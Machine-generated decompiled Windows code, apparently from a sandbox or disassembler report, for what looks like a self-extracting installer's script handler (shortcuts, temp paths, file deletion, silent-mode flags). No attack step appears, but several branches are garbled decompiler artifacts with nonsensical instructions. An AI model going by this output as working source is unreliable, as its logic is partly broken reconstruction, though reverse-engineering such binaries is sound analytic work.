                                                                                              							__eflags =  *((intOrPtr*)(__ebp - 0x17c90)) - __si;
                                                                                              							if(__eflags != 0) {
                                                                                              								__ebp - 0x17c90 = __ebp - 0x2440;
                                                                                              								E00410BC9(__eflags, __ebp - 0x2440, __ebp - 0x17c90, __ebx) = __ebp - 0x2440;
                                                                                              								__eax = E0040A116(__eflags, __ebp - 0x2440, __ebx);
                                                                                              							}
                                                                                              							__ebp - 0x2440 = __ebp - 0xac90;
                                                                                              							__eax = E0041A7F7(__ebp - 0xac90, __ebp - 0x2440);
                                                                                              							_pop(__ecx);
                                                                                              							_pop(__ecx);
                                                                                              							__eax = __ebp - 0x13c90;
                                                                                              							__eflags =  *(__ebp - 0x13c90) - __si;
                                                                                              							if(__eflags == 0) {
                                                                                              								__eax = __ebp - 0x19c90;
                                                                                              							}
                                                                                              							__ebp - 0x2440 = E00410BC9(__eflags, __ebp - 0x2440, __ebp - 0x2440, __ebx);
                                                                                              							__eax = __ebp - 0x2440;
                                                                                              							__eflags = E0040A76A(__ebp - 0x2440) - __esi;
                                                                                              							if(__eflags == 0) {
                                                                                              								L155:
                                                                                              								__ebp - 0x2440 = E00410BC9(__eflags, __ebp - 0x2440, L".lnk", __ebx);
                                                                                              								goto L156;
                                                                                              							} else {
                                                                                              								__eflags = __eax;
                                                                                              								if(__eflags == 0) {
                                                                                              									L156:
                                                                                              									__ebp - 0x2440 = E0040935F(__ebx, __ecx, __edi, __ebp - 0x2440, 1);
                                                                                              									__ebp - 0xcc90 = __ebp - 0x9c90;
                                                                                              									__eax = E0041A7F7(__ebp - 0x9c90, __ebp - 0xcc90);
                                                                                              									_pop(__ecx);
                                                                                              									_pop(__ecx);
                                                                                              									__ebp - 0x9c90 = E0040A7F3(__eflags, __ebp - 0x9c90);
                                                                                              									 *(__ebp - 0x4c40) & 0x0000ffff =  ~( *(__ebp - 0x4c40) & 0x0000ffff);
                                                                                              									asm("sbb eax, eax");
                                                                                              									__ecx = __ebp - 0x4c40;
                                                                                              									__eax =  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40;
                                                                                              									 *(__ebp - 0xbc90) & 0x0000ffff =  ~( *(__ebp - 0xbc90) & 0x0000ffff);
                                                                                              									asm("sbb ecx, ecx");
                                                                                              									__edx = __ebp - 0xbc90;
                                                                                              									__ecx =  ~( *(__ebp - 0xbc90) & 0x0000ffff) & __ebp - 0x0000bc90;
                                                                                              									 *(__ebp - 0x15c90) & 0x0000ffff =  ~( *(__ebp - 0x15c90) & 0x0000ffff);
                                                                                              									asm("sbb edx, edx");
                                                                                              									__esi = __ebp - 0x15c90;
                                                                                              									__edx =  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90;
                                                                                              									 *(__ebp - 0x9c90) & 0x0000ffff =  ~( *(__ebp - 0x9c90) & 0x0000ffff);
                                                                                              									asm("sbb esi, esi");
                                                                                              									__edi = __ebp - 0x9c90;
                                                                                              									__esi =  ~( *(__ebp - 0x9c90) & 0x0000ffff) & __edi;
                                                                                              									__ebp - 0x2440 = __ebp - 0xcc90;
                                                                                              									__eax = E00419BB0(__ecx, 0, __ebp - 0xcc90, __ebp - 0x2440, __esi,  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90, __ecx,  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40);
                                                                                              									__eflags =  *(__ebp - 0xac90);
                                                                                              									if( *(__ebp - 0xac90) != 0) {
                                                                                              										__eax = __ebp - 0xac90;
                                                                                              										SHChangeNotify(0x1000, 5, __ebp - 0xac90, 0);
                                                                                              									}
                                                                                              									while(1) {
                                                                                              										L160:
                                                                                              										_t263 = E0040D781(_t339 - 0x11, _t339 - 0xec90, _t337,  *((intOrPtr*)(_t339 + 0xc)), _t339 - 0x4440, _t339 + 0xf, 0x1000);
                                                                                              										 *((intOrPtr*)(_t339 + 0xc)) = _t263;
                                                                                              										if(_t263 != 0) {
                                                                                              											_t335 = GetFileAttributesW;
                                                                                              											_t322 = _t339 - 0x1bc90;
                                                                                              											_t337 = 0x438818;
                                                                                              											_t264 = _t339 - 0x4440;
                                                                                              											 *(_t339 - 0x10) = _t339 - 0x1bc90;
                                                                                              											 *((intOrPtr*)(_t339 - 0x18)) = 6;
                                                                                              											goto L2;
                                                                                              										} else {
                                                                                              											break;
                                                                                              										}
                                                                                              										L4:
                                                                                              										while(E00411E60(_t339 - 0xec90,  *((intOrPtr*)(0x430100 +  *(_t339 - 0x10) * 4))) != 0) {
                                                                                              											 *(_t339 - 0x10) =  *(_t339 - 0x10) + 1;
                                                                                              											if( *(_t339 - 0x10) < 0xe) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												goto L160;
                                                                                              											}
                                                                                              										}
                                                                                              										__eflags =  *(_t339 - 0x10) - 0xd;
                                                                                              										if( *(_t339 - 0x10) > 0xd) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										switch( *((intOrPtr*)( *(_t339 - 0x10) * 4 +  &M0040F443))) {
                                                                                              											case 0:
                                                                                              												__eflags =  *((intOrPtr*)(_t339 + 0x10)) - 2;
                                                                                              												if( *((intOrPtr*)(_t339 + 0x10)) != 2) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												E00419C9B(_t339 - 0x8c90, _t319);
                                                                                              												E0040A146(_t339 - 0x8c90, _t339 - 0x4440, _t339 - 0xfc90, _t319);
                                                                                              												E00409433(_t339 - 0x7c90);
                                                                                              												 *(_t339 - 4) =  *(_t339 - 4) & 0x00000000;
                                                                                              												E0040945C(_t339 - 0x7c90, _t339 - 0xfc90);
                                                                                              												E004067E1(_t339 - 0x5c88);
                                                                                              												_push(0);
                                                                                              												_t280 = E0040960E(_t339 - 0x7c90, _t333, _t339 - 0x5c88);
                                                                                              												__eflags = _t280;
                                                                                              												if(_t280 == 0) {
                                                                                              													L25:
                                                                                              													 *(_t339 - 4) =  *(_t339 - 4) | 0xffffffff;
                                                                                              													E00409449(_t339 - 0x7c90);
                                                                                              													goto L160;
                                                                                              												} else {
                                                                                              													_t337 = L"%s.%d.tmp";
                                                                                              													do {
                                                                                              														SetFileAttributesW(_t339 - 0x5c88, 0);
                                                                                              														__eflags =  *((char*)(_t339 - 0x4c7c));
                                                                                              														if(__eflags == 0) {
                                                                                              															L17:
                                                                                              															_t285 = GetFileAttributesW(_t339 - 0x5c88);
                                                                                              															__eflags = _t285 - 0xffffffff;
                                                                                              															if(_t285 == 0xffffffff) {
                                                                                              																goto L24;
                                                                                              															}
                                                                                              															_t289 = DeleteFileW(_t339 - 0x5c88);
                                                                                              															__eflags = _t289;
                                                                                              															if(_t289 != 0) {
                                                                                              																goto L24;
                                                                                              															} else {
                                                                                              																 *(_t339 - 0x10) =  *(_t339 - 0x10) & _t289;
                                                                                              																_push(_t289);
                                                                                              																goto L21;
                                                                                              																L21:
                                                                                              																E0040BC16(_t339 - 0x1040, _t319, _t337, _t339 - 0x5c88);
                                                                                              																_t341 = _t341 + 0x14;
                                                                                              																_t294 = GetFileAttributesW(_t339 - 0x1040);
                                                                                              																__eflags = _t294 - 0xffffffff;
                                                                                              																if(_t294 != 0xffffffff) {
                                                                                              																	_t61 = _t339 - 0x10;
                                                                                              																	 *_t61 =  *(_t339 - 0x10) + 1;
                                                                                              																	__eflags =  *_t61;
                                                                                              																	_push( *(_t339 - 0x10));
                                                                                              																	goto L21;
                                                                                              																} else {
                                                                                              																	_t297 = MoveFileW(_t339 - 0x5c88, _t339 - 0x1040);
                                                                                              																	__eflags = _t297;
                                                                                              																	if(_t297 != 0) {
                                                                                              																		MoveFileExW(_t339 - 0x1040, 0, 4);
                                                                                              																	}
                                                                                              																	goto L24;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              														E0040AA7D(__eflags, _t339 - 0x8c90, _t339 - 0x1040, _t319);
                                                                                              														E0040A116(__eflags, _t339 - 0x1040, _t319);
                                                                                              														_t306 = E0041A7AF(_t339 - 0x8c90);
                                                                                              														 *((intOrPtr*)(_t339 - 0x18)) = _t306;
                                                                                              														__eflags = _t306 - 4;
                                                                                              														if(_t306 < 4) {
                                                                                              															L15:
                                                                                              															_t308 = E0040A0A4(_t339 - 0x4440);
                                                                                              															__eflags = _t308;
                                                                                              															if(_t308 != 0) {
                                                                                              																goto L25;
                                                                                              															}
                                                                                              															L16:
                                                                                              															_t310 = E0041A7AF(_t339 - 0x5c88);
                                                                                              															__eflags = 0;
                                                                                              															 *((short*)(_t339 + _t310 * 2 - 0x5c86)) = 0;
                                                                                              															E0041A820(_t335, _t339 - 0x40, 0, 0x1e);
                                                                                              															_t341 = _t341 + 0x10;
                                                                                              															_push(0x14);
                                                                                              															_pop(_t313);
                                                                                              															 *((short*)(_t339 - 0x30)) = _t313;
                                                                                              															 *((intOrPtr*)(_t339 - 0x38)) = _t339 - 0x5c88;
                                                                                              															 *((intOrPtr*)(_t339 - 0x3c)) = 3;
                                                                                              															SHFileOperationW(_t339 - 0x40);
                                                                                              															goto L17;
                                                                                              														}
                                                                                              														_t318 = E0041A7AF(_t339 - 0x1040);
                                                                                              														__eflags =  *((intOrPtr*)(_t339 - 0x18)) - _t318;
                                                                                              														if( *((intOrPtr*)(_t339 - 0x18)) > _t318) {
                                                                                              															goto L16;
                                                                                              														}
                                                                                              														goto L15;
                                                                                              														L24:
                                                                                              														_push(0);
                                                                                              														_t287 = E0040960E(_t339 - 0x7c90, _t333, _t339 - 0x5c88);
                                                                                              														__eflags = _t287;
                                                                                              													} while (_t287 != 0);
                                                                                              													goto L25;
                                                                                              												}
                                                                                              											case 1:
                                                                                              												__eflags =  *(__ebp + 0x10);
                                                                                              												if( *(__ebp + 0x10) == 0) {
                                                                                              													__eflags =  *((char*)(__ebp - 0x11));
                                                                                              													if(__eflags == 0) {
                                                                                              														__edi = __ebp + 0xc;
                                                                                              														__edi = E0040D92D(__ebp + 0xc, __eflags);
                                                                                              													} else {
                                                                                              														__edi = __ebp - 0x4440;
                                                                                              													}
                                                                                              													__eflags =  *((char*)(__ebp - 0x12));
                                                                                              													if( *((char*)(__ebp - 0x12)) == 0) {
                                                                                              														__esi = E0041A7AF( *0x441850);
                                                                                              													} else {
                                                                                              														__esi = 0;
                                                                                              													}
                                                                                              													__eax = E0041A7AF(__edi);
                                                                                              													__eax = __eax + __esi;
                                                                                              													_push(__eax);
                                                                                              													_push( *0x441850);
                                                                                              													__eax = E0041A594(__ebx, __edi, __esi, __eflags);
                                                                                              													__esp = __esp + 0xc;
                                                                                              													__eflags =  *((char*)(__ebp - 0x12));
                                                                                              													 *0x441850 = __eax;
                                                                                              													if( *((char*)(__ebp - 0x12)) != 0) {
                                                                                              														__ecx = 0;
                                                                                              														__eflags = 0;
                                                                                              														 *__eax = __cx;
                                                                                              													}
                                                                                              													__eax = E0041A7C9(__eax, __edi);
                                                                                              													__eflags =  *((char*)(__ebp - 0x11));
                                                                                              													_pop(__ecx);
                                                                                              													_pop(__ecx);
                                                                                              													if(__eflags == 0) {
                                                                                              														_push(__edi);
                                                                                              														__eax = E0041A506(__ebx, __edi, __esi, __eflags);
                                                                                              														_pop(__ecx);
                                                                                              													}
                                                                                              												}
                                                                                              												goto L160;
                                                                                              											case 2:
                                                                                              												__eflags =  *(__ebp + 0x10);
                                                                                              												if( *(__ebp + 0x10) == 0) {
                                                                                              													__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
                                                                                              												}
                                                                                              												goto L160;
                                                                                              											case 3:
                                                                                              												__eflags =  *(__ebp + 0x10);
                                                                                              												if( *(__ebp + 0x10) != 0) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eflags =  *0x44187a;
                                                                                              												if( *0x44187a != 0) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eax = 0;
                                                                                              												__eflags =  *(__ebp - 0x4440) - 0x22;
                                                                                              												__edi = __ebp - 0x4440;
                                                                                              												 *(__ebp - 0x18) = __edi;
                                                                                              												 *(__ebp - 0x1040) = __ax;
                                                                                              												if( *(__ebp - 0x4440) == 0x22) {
                                                                                              													__edi = __ebp - 0x443e;
                                                                                              													 *(__ebp - 0x18) = __edi;
                                                                                              												}
                                                                                              												__eax = E0041A7AF(__edi);
                                                                                              												__eflags = __eax - __ebx;
                                                                                              												if(__eax >= __ebx) {
                                                                                              													goto L160;
                                                                                              												} else {
                                                                                              													__eax = __edi->i & 0x0000ffff;
                                                                                              													__eflags = __ax - 0x2e;
                                                                                              													if(__ax != 0x2e) {
                                                                                              														L50:
                                                                                              														__eflags = __ax - 0x5c;
                                                                                              														if(__ax == 0x5c) {
                                                                                              															L62:
                                                                                              															_push(__edi);
                                                                                              															L63:
                                                                                              															__eax = __ebp - 0x1040;
                                                                                              															_push(__ebp - 0x1040);
                                                                                              															__eax = E0041A7F7();
                                                                                              															L64:
                                                                                              															_pop(__ecx);
                                                                                              															_pop(__ecx);
                                                                                              															L65:
                                                                                              															__eax = __ebp - 0x1040;
                                                                                              															__eax = E0041CA4F(__ebp - 0x1040, 0x22);
                                                                                              															_pop(__ecx);
                                                                                              															_pop(__ecx);
                                                                                              															__eflags = __eax;
                                                                                              															if(__eax != 0) {
                                                                                              																__eflags =  *((short*)(__eax + 2));
                                                                                              																if( *((short*)(__eax + 2)) == 0) {
                                                                                              																	__ecx = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	 *__eax = __cx;
                                                                                              																}
                                                                                              															}
                                                                                              															__ebp - 0x1040 = E0041A7F7(__esi, __ebp - 0x1040);
                                                                                              															_pop(__ecx);
                                                                                              															_pop(__ecx);
                                                                                              															__ebp - 0x1040 = E0040DB16(__esi, __ebp - 0x1040, __ebx); // executed
                                                                                              															__edi = GetDlgItem( *(__ebp + 8), 0x66);
                                                                                              															__ebp - 0x1040 = SetWindowTextW(__edi, __ebp - 0x1040); // executed
                                                                                              															__eax = SendMessageW(__edi, 0x143, 0, __esi); // executed
                                                                                              															__eax = __ebp - 0x1040;
                                                                                              															__eax = E0041AA21(__esi, __ebp - 0x1040);
                                                                                              															_pop(__ecx);
                                                                                              															_pop(__ecx);
                                                                                              															__eflags = __eax;
                                                                                              															if(__eax != 0) {
                                                                                              																__ebp - 0x1040 = SendMessageW(__edi, 0x143, 0, __ebp - 0x1040);
                                                                                              															}
                                                                                              															goto L160;
                                                                                              														}
                                                                                              														__eflags = __ax;
                                                                                              														if(__ax == 0) {
                                                                                              															L53:
                                                                                              															__eax = __ebp - 0x1c;
                                                                                              															__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x1c);
                                                                                              															__eflags = __eax;
                                                                                              															if(__eax == 0) {
                                                                                              																__ebp - 0x10 = __ebp - 0x1040;
                                                                                              																__eax = __ebp - 0x20;
                                                                                              																 *(__ebp - 0x10) = 0x1000;
                                                                                              																RegQueryValueExW( *(__ebp - 0x1c), L"ProgramFilesDir", 0, __ebp - 0x20, __ebp - 0x1040, __ebp - 0x10) = RegCloseKey( *(__ebp - 0x1c));
                                                                                              																 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                              																__eax = 0x7ff;
                                                                                              																__eflags =  *(__ebp - 0x10) - 0x7ff;
                                                                                              																if( *(__ebp - 0x10) < 0x7ff) {
                                                                                              																	__eax =  *(__ebp - 0x10);
                                                                                              																}
                                                                                              																__ecx = 0;
                                                                                              																__eflags = 0;
                                                                                              																 *((short*)(__ebp + __eax * 2 - 0x1040)) = __cx;
                                                                                              															}
                                                                                              															__eflags =  *(__ebp - 0x1040);
                                                                                              															if( *(__ebp - 0x1040) != 0) {
                                                                                              																__eax = __ebp - 0x1040;
                                                                                              																__eax = E0041A7AF(__ebp - 0x1040);
                                                                                              																__eflags =  *((short*)(__ebp + __eax * 2 - 0x1042)) - 0x5c;
                                                                                              																if( *((short*)(__ebp + __eax * 2 - 0x1042)) != 0x5c) {
                                                                                              																	__ebp - 0x1040 = E0041A7C9(__ebp - 0x1040, "\\");
                                                                                              																	_pop(__ecx);
                                                                                              																	_pop(__ecx);
                                                                                              																}
                                                                                              															}
                                                                                              															__edi = E0041A7AF(__edi);
                                                                                              															__eax = __ebp - 0x1040;
                                                                                              															__edi = __edi + E0041A7AF(__ebp - 0x1040);
                                                                                              															__eflags = __edi - 0x7ff;
                                                                                              															if(__edi >= 0x7ff) {
                                                                                              																goto L65;
                                                                                              															} else {
                                                                                              																__ebp - 0x1040 = E0041A7C9(__ebp - 0x1040,  *(__ebp - 0x18));
                                                                                              																goto L64;
                                                                                              															}
                                                                                              														}
                                                                                              														__eflags = __edi->i - 0x3a;
                                                                                              														if(__edi->i == 0x3a) {
                                                                                              															goto L62;
                                                                                              														}
                                                                                              														goto L53;
                                                                                              													}
                                                                                              													__eflags = __edi->i - 0x5c;
                                                                                              													if(__edi->i != 0x5c) {
                                                                                              														goto L50;
                                                                                              													}
                                                                                              													_t97 = __edi + 4; // 0x26
                                                                                              													__eax = _t97;
                                                                                              													__eflags =  *__eax;
                                                                                              													if( *__eax == 0) {
                                                                                              														goto L160;
                                                                                              													} else {
                                                                                              														_push(__eax);
                                                                                              														goto L63;
                                                                                              													}
                                                                                              												}
                                                                                              											case 4:
                                                                                              												__eflags =  *0x441874 - 1;
                                                                                              												__eflags = __eax - 0x441874;
                                                                                              												__edi->i = __edi->i + __ecx;
                                                                                              												__eflags = __edi->i & __dh;
                                                                                              												_push(es);
                                                                                              												 *__eax =  *__eax + __al;
                                                                                              												__eflags =  *__eax;
                                                                                              											case 5:
                                                                                              												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
                                                                                              												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													L82:
                                                                                              													 *0x441831 = 0;
                                                                                              													 *0x441830 = 1;
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eax = __eax - 0x30;
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													 *0x441831 = 0;
                                                                                              													L81:
                                                                                              													 *0x441830 = 0;
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eax = __eax - 1;
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													goto L82;
                                                                                              												}
                                                                                              												__eax = __eax - 1;
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax != 0) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												 *0x441831 = 1;
                                                                                              												goto L81;
                                                                                              											case 6:
                                                                                              												__eflags =  *(__ebp + 0x10) - 4;
                                                                                              												if( *(__ebp + 0x10) != 4) {
                                                                                              													goto L92;
                                                                                              												}
                                                                                              												__eax = __ebp - 0x4440;
                                                                                              												__eax = E0041AA21(__ebp - 0x4440, L"<>");
                                                                                              												_pop(__ecx);
                                                                                              												_pop(__ecx);
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													goto L92;
                                                                                              												}
                                                                                              												_push(0);
                                                                                              												goto L91;
                                                                                              											case 7:
                                                                                              												__eflags =  *(__ebp + 0x10) - 1;
                                                                                              												if(__eflags != 0) {
                                                                                              													L112:
                                                                                              													__eflags =  *(__ebp + 0x10) - 7;
                                                                                              													if( *(__ebp + 0x10) == 7) {
                                                                                              														__eflags =  *0x441874;
                                                                                              														if( *0x441874 == 0) {
                                                                                              															 *0x441874 = 2;
                                                                                              														}
                                                                                              														 *0x441870 = 1;
                                                                                              													}
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__ebp - 0x8c90 = GetTempPathW(__ebx, __ebp - 0x8c90);
                                                                                              												__ebp - 0x8c90 = E0040A116(__eflags, __ebp - 0x8c90, __ebx);
                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
                                                                                              												_push(0);
                                                                                              												__esi = L"%s%s%d";
                                                                                              												while(1) {
                                                                                              													_push( *0x4300c8);
                                                                                              													__ebp - 0x8c90 = __ebp - 0x1040;
                                                                                              													E0040BC16(__ebp - 0x1040, __ebx, __esi, __ebp - 0x8c90) = __ebp - 0x1040;
                                                                                              													_push(__ebp - 0x1040);
                                                                                              													__eax = __edi->i();
                                                                                              													__eflags = __eax - 0xffffffff;
                                                                                              													if(__eax == 0xffffffff) {
                                                                                              														break;
                                                                                              													}
                                                                                              													_t146 = __ebp - 0x10;
                                                                                              													 *_t146 =  *(__ebp - 0x10) + 1;
                                                                                              													__eflags =  *_t146;
                                                                                              													_push( *(__ebp - 0x10));
                                                                                              												}
                                                                                              												__ebp - 0x1040 = SetDlgItemTextW( *(__ebp + 8), 0x66, __ebp - 0x1040);
                                                                                              												__eflags =  *(__ebp - 0x4440);
                                                                                              												if( *(__ebp - 0x4440) == 0) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eflags =  *0x44184a;
                                                                                              												if( *0x44184a != 0) {
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												__eax = 0;
                                                                                              												 *(__ebp - 0x1440) = __ax;
                                                                                              												__eax = __ebp - 0x4440;
                                                                                              												__eax = E0041CA29(__ebp - 0x4440, 0x2c);
                                                                                              												_pop(__ecx);
                                                                                              												_pop(__ecx);
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax != 0) {
                                                                                              													L108:
                                                                                              													__eflags =  *(__ebp - 0x1440);
                                                                                              													if( *(__ebp - 0x1440) == 0) {
                                                                                              														__ebp - 0x1bc90 = __ebp - 0x4440;
                                                                                              														E0041A7F7(__ebp - 0x4440, __ebp - 0x1bc90) = __ebp - 0x19c90;
                                                                                              														__ebp - 0x1440 = E0041A7F7(__ebp - 0x1440, __ebp - 0x19c90);
                                                                                              													}
                                                                                              													__ebp - 0x4440 = E0040D24C(__ebp - 0x4440);
                                                                                              													__eax = 0;
                                                                                              													 *(__ebp - 0x3440) = __ax;
                                                                                              													__ebp - 0x1440 = __ebp - 0x4440;
                                                                                              													__eax = MessageBoxW( *(__ebp + 8), __ebp - 0x4440, __ebp - 0x1440, 0x24);
                                                                                              													__eflags = __eax - 6;
                                                                                              													if(__eax == 6) {
                                                                                              														goto L160;
                                                                                              													} else {
                                                                                              														 *0x441849 = 1;
                                                                                              														 *0x44183c = 1;
                                                                                              														__eax = EndDialog( *(__ebp + 8), 1);
                                                                                              														goto L112;
                                                                                              													}
                                                                                              												}
                                                                                              												__ecx = 0;
                                                                                              												__eflags =  *(__ebp - 0x4440) - __cx;
                                                                                              												if( *(__ebp - 0x4440) == __cx) {
                                                                                              													goto L108;
                                                                                              												}
                                                                                              												__eax = __ebp - 0x4440;
                                                                                              												while(1) {
                                                                                              													__eflags =  *__eax - 0x40;
                                                                                              													if( *__eax == 0x40) {
                                                                                              														break;
                                                                                              													}
                                                                                              													__ecx = __ecx + 1;
                                                                                              													__eax = __ebp + __ecx * 2 - 0x4440;
                                                                                              													__eflags =  *__eax;
                                                                                              													if( *__eax != 0) {
                                                                                              														continue;
                                                                                              													}
                                                                                              													goto L108;
                                                                                              												}
                                                                                              												__esi = __ecx + __ecx;
                                                                                              												__ebp + __esi - 0x443e = __ebp - 0x1440;
                                                                                              												__eax = E0041A7F7(__ebp - 0x1440, __ebp + __esi - 0x443e);
                                                                                              												_pop(__ecx);
                                                                                              												__eax = 0;
                                                                                              												__eflags = 0;
                                                                                              												_pop(__ecx);
                                                                                              												 *(__ebp + __esi - 0x4440) = __ax;
                                                                                              												goto L108;
                                                                                              											case 8:
                                                                                              												__eflags =  *(__ebp + 0x10) - 3;
                                                                                              												if( *(__ebp + 0x10) == 3) {
                                                                                              													__eflags =  *(__ebp - 0x4440);
                                                                                              													if(__eflags != 0) {
                                                                                              														__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
                                                                                              													}
                                                                                              													__edi = __ebp + 0xc;
                                                                                              													 *0x441854 = E0040D92D(__edi, __eflags);
                                                                                              												}
                                                                                              												 *0x44184b = 1;
                                                                                              												goto L160;
                                                                                              											case 9:
                                                                                              												__eflags =  *(__ebp + 0x10) - 5;
                                                                                              												if( *(__ebp + 0x10) != 5) {
                                                                                              													L92:
                                                                                              													 *0x44185c = 1;
                                                                                              													goto L160;
                                                                                              												}
                                                                                              												_push(1);
                                                                                              												L91:
                                                                                              												_push( *(__ebp + 8));
                                                                                              												__ecx = __ebp - 0x4440;
                                                                                              												__eax = E0040E46C(__ecx);
                                                                                              												goto L92;
                                                                                              											case 0xa:
                                                                                              												goto L0;
                                                                                              											case 0xb:
                                                                                              												__eflags =  *(__ebp + 0x10) - 7;
                                                                                              												if( *(__ebp + 0x10) == 7) {
                                                                                              													 *0x441878 = 1;
                                                                                              												}
                                                                                              												goto L160;
                                                                                              											case 0xc:
                                                                                              												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
                                                                                              												__eax = E0041D265( *(__ebp - 0x4440) & 0x0000ffff);
                                                                                              												__eflags = __eax - 0x46;
                                                                                              												if(__eax == 0x46) {
                                                                                              													 *0x441823 = 1;
                                                                                              												} else {
                                                                                              													__eflags = __eax - 0x55;
                                                                                              													if(__eax == 0x55) {
                                                                                              														 *0x441822 = 1;
                                                                                              													} else {
                                                                                              														 *0x441823 = 0;
                                                                                              														 *0x441822 = 0;
                                                                                              													}
                                                                                              												}
                                                                                              												goto L160;
                                                                                              											case 0xd:
                                                                                              												 *0x44185d = 1;
                                                                                              												__eax = __eax + 0x44185d;
                                                                                              												__ecx = __ecx + __ebp;
                                                                                              												 *0x7d830000 =  *0x7d830000 ^ __eax;
                                                                                              												__eflags =  *0x7d830000;
                                                                                              												goto L160;
                                                                                              										}
                                                                                              										L2:
                                                                                              										_t264 = E0040DCB8(_t322, _t264,  *(_t339 - 0x10));
                                                                                              										 *(_t339 - 0x10) =  *(_t339 - 0x10) + 0x2000;
                                                                                              										_t9 = _t339 - 0x18;
                                                                                              										 *_t9 =  *((intOrPtr*)(_t339 - 0x18)) - 1;
                                                                                              										if( *_t9 != 0) {
                                                                                              											goto L2;
                                                                                              										} else {
                                                                                              											 *(_t339 - 0x10) =  *(_t339 - 0x10) & 0x00000000;
                                                                                              											goto L4;
                                                                                              										}
                                                                                              									}
                                                                                              									 *[fs:0x0] =  *((intOrPtr*)(_t339 - 0xc));
                                                                                              									return _t263;
                                                                                              								}
                                                                                              								goto L155;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}









                                                                                              0x00000000
                                                                                              0x0040f0c2
                                                                                              0x0040f0c2
                                                                                              0x0040f0c6
                                                                                              0x00000000
                                                                                              0x0040f0cc
                                                                                              0x0040f0cc
                                                                                              0x0040f0ce
                                                                                              0x0040f0d5
                                                                                              0x0040f0dd
                                                                                              0x0040f0e3
                                                                                              0x0040f0e4
                                                                                              0x0040f0e7
                                                                                              0x0040f11c
                                                                                              0x0040f121
                                                                                              0x0040f127
                                                                                              0x0040f128
                                                                                              0x0040f12d
                                                                                              0x0040f0e9
                                                                                              0x0040f0e9
                                                                                              0x0040f0ec
                                                                                              0x0040f0f2
                                                                                              0x0040f108
                                                                                              0x0040f10d
                                                                                              0x0040f10e
                                                                                              0x0040f113
                                                                                              0x0040f0f4
                                                                                              0x0040f0f4
                                                                                              0x0040f0f9
                                                                                              0x0040f0fa
                                                                                              0x0040f0ff
                                                                                              0x0040f0ff
                                                                                              0x0040f0f2
                                                                                              0x0040f134
                                                                                              0x0040f136
                                                                                              0x0040f13d
                                                                                              0x0040f14b
                                                                                              0x0040f152
                                                                                              0x0040f157
                                                                                              0x0040f15f
                                                                                              0x0040f160
                                                                                              0x0040f161
                                                                                              0x0040f1b2
                                                                                              0x0040f1b7
                                                                                              0x0040f1b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f1bf
                                                                                              0x0040f1c3
                                                                                              0x0040f1cb
                                                                                              0x0040f1d1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f1d3
                                                                                              0x0040f1d3
                                                                                              0x0040f1d3
                                                                                              0x0040f1d6
                                                                                              0x0040f1da
                                                                                              0x0040f1e2
                                                                                              0x0040f1e2
                                                                                              0x0040f1e5
                                                                                              0x0040f1e7
                                                                                              0x0040f1f1
                                                                                              0x0040f1f6
                                                                                              0x0040f1f8
                                                                                              0x0040f238
                                                                                              0x00000000
                                                                                              0x0040f238
                                                                                              0x0040f1fa
                                                                                              0x0040f1fd
                                                                                              0x0040f201
                                                                                              0x0040f219
                                                                                              0x0040f219
                                                                                              0x0040f21a
                                                                                              0x0040f21b
                                                                                              0x0040f21b
                                                                                              0x0040f221
                                                                                              0x0040f222
                                                                                              0x0040f228
                                                                                              0x0040f22e
                                                                                              0x0040f231
                                                                                              0x0040f232
                                                                                              0x0040f233
                                                                                              0x00000000
                                                                                              0x0040f233
                                                                                              0x0040f205
                                                                                              0x0040f206
                                                                                              0x0040f20d
                                                                                              0x0040f210
                                                                                              0x0040f211
                                                                                              0x00000000
                                                                                              0x0040f211
                                                                                              0x0040f1dc
                                                                                              0x0040f1e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f23b
                                                                                              0x0040f23b
                                                                                              0x0040f23c
                                                                                              0x0040f23d
                                                                                              0x0040f23d
                                                                                              0x0040f243
                                                                                              0x0040f247
                                                                                              0x0040f249
                                                                                              0x0040f24c
                                                                                              0x0040f24c
                                                                                              0x0040f24e
                                                                                              0x0040f24e
                                                                                              0x00000000
                                                                                              0x0040f163
                                                                                              0x0040f16a
                                                                                              0x0040f176
                                                                                              0x0040f17f
                                                                                              0x0040f187
                                                                                              0x0040f189
                                                                                              0x0040f18f
                                                                                              0x0040f191
                                                                                              0x0040f19f
                                                                                              0x0040f1a4
